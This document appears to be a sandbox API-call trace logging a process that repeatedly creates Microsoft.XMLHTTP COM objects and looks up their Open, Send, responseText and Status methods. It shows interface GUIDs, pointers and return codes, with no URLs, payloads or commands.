	[0929.918] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0929.918] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7490) returned 0x0
	[0929.918] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0929.918] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74f8) returned 0x0
	[0929.918] ??2@YAPEAX_K@Z () returned 0x62f330
	[0929.918] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74f8, pUnkSite=0x62f330) 
	[0929.918] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0929.918] XMLHTTPRequest:IUnknown:Release (This=0x49c74f8) returned 0x0
	[0929.918] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7490) returned 0x0
	[0929.919] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7490) returned 0x3
	[0929.919] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0929.919] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7490, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0929.919] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0929.919] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0929.919] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7490, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0929.919] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0932.416] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0932.416] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7490, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0932.417] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0932.417] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0932.417] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7490, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0932.417] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0939.560] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0939.560] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7490, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0939.560] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0939.562] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0939.562] SysStringLen (param_1=0x0) returned 0x0
	[0939.562] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0939.562] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0939.562] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7490) returned 0x0
	[0939.562] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0939.562] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7268) returned 0x0
	[0939.562] ??2@YAPEAX_K@Z () returned 0x62f330
	[0939.562] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7268, pUnkSite=0x62f330) 
	[0939.562] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0939.562] XMLHTTPRequest:IUnknown:Release (This=0x49c7268) returned 0x0
	[0939.562] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7490) returned 0x0
	[0939.562] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7490) returned 0x3
	[0939.562] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0939.562] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7490, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0939.564] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0939.564] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0939.565] SysStringLen (param_1=0x0) returned 0x0
	[0939.565] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0939.565] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0939.565] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c72c0) returned 0x0
	[0939.565] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0939.565] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74f8) returned 0x0
	[0939.565] ??2@YAPEAX_K@Z () returned 0x62f310
	[0939.565] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74f8, pUnkSite=0x62f310) 
	[0939.565] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0939.565] XMLHTTPRequest:IUnknown:Release (This=0x49c74f8) returned 0x0
	[0939.565] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c72c0) returned 0x0
	[0939.565] XMLHTTPRequest:IUnknown:AddRef (This=0x49c72c0) returned 0x3
	[0939.565] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72c0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0939.565] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72c0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0939.565] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72c0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0939.566] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0939.566] SysStringLen (param_1=0x0) returned 0x0
	[0939.566] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0939.566] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0939.566] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0939.566] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0939.566] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7238) returned 0x0
	[0939.566] ??2@YAPEAX_K@Z () returned 0x62f330
	[0939.566] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7238, pUnkSite=0x62f330) 
	[0939.566] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0939.566] XMLHTTPRequest:IUnknown:Release (This=0x49c7238) returned 0x0
	[0939.566] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0939.566] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0939.566] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0939.566] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0939.566] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0939.567] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0939.567] SysStringLen (param_1=0x0) returned 0x0
	[0939.567] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0939.567] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0939.567] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7490) returned 0x0
	[0939.567] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0939.567] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74f8) returned 0x0
	[0939.567] ??2@YAPEAX_K@Z () returned 0x62f310
	[0939.567] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74f8, pUnkSite=0x62f310) 
	[0939.567] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0939.567] XMLHTTPRequest:IUnknown:Release (This=0x49c74f8) returned 0x0
	[0939.567] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7490) returned 0x0
	[0939.567] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7490) returned 0x3
	[0939.567] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0939.567] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7490, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0939.567] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0939.568] longjmp () 
	[0939.568] longjmp () 
	[0939.568] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0939.568] SysStringLen (param_1=0x0) returned 0x0
	[0939.568] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0939.568] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0939.568] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7230) returned 0x0
	[0939.568] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
